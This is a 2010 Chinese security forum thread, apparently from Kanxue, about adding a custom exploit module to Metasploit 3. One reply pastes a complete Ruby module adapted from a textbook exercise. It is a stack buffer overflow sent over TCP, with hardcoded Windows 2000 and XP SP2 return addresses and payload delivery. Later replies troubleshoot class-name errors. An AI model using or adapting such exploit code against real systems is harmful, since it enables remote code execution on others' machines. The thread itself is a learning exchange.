首页
社区
课程
招聘
[求助]MSF3.2 如何添加EXPLOIT啊
发表于: 2010-1-29 12:29 6161

[求助]MSF3.2 如何添加EXPLOIT啊

2010-1-29 12:29
6161
究竟是怎么添加啊,怎么没有人懂得么?!!!

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 10
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
##
# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
module Msf
class Exploits::Yangshuo::POC < Msf::Exploit::Remote
include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'YANGSHUO_POC',
      'Version'       => '1.0',
      'Platform'  => 'win',
      'Privileged'  => true,
      'License'       => MSF_LICENSE,
      'Author'        => 'yangshuo',
      'Targets'       => [        
            ['Windows 2000',  {'Ret' => [200 , 0x77e2307b] }],
            ['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }],            
              ],
      'DefaultTarget' => 0,
              
      'Payload'       => {
            'Space'    => 200,
            'BadChars' => "\x00",
            'StackAdjustment' => -3500,
              },  
      'Description'    => %q{
            this module is exploit practice of book
            "Vulnerability Exploit and Analysis Technique"
            used only for educational purpose
            },
      'Arch'           => 'x86',
      'References'     => [
                                  [ 'URL', 'http://www.failwest.com' ],
                                  [ 'CVE', '44444' ],
                                       ],
      'DefaultOptions' => { 'EXITFUNC' => 'process' }                     
                     ))
  end #end of initialize

  def exploit
    connect
    print_status("Sending #{payload.encoded.length} byte payload...")
    buf = 'a'*target['Ret'][0]
    buf << [target['Ret'][1]].pack('V')
    buf <<payload.encoded;
    sock.put(buf)  
    handler
    disconnect
  end  #end of exploit def
end
end
这是  修改FAILWEST的  代码所得的,你看看  必须符合MF3的标准才可以  上面那个ID,# $Id: poc.rb 8300 2010-03-27 02:28:11Z hdm $
class Exploits::Yangshuo::POC   这个类名一定要大写  要不报错!~~~~~
你试试吧  要不行  你在发帖!
总之一句话  你的东西得符合  MF3的 要求  要不他是不可能是别的
2010-4-15 13:46
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
我也遇到了,但是这个方法似乎没用,即使全都是大写也不行,我用的是3.3.4
2010-4-28 15:00
0
雪    币: 10
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
哥们那我怎么好使呢!~~~你把我的代码粘进去看看  不行  你再发贴!~~~
2010-5-1 14:57
0
游客
登录 | 注册 方可回帖
返回
//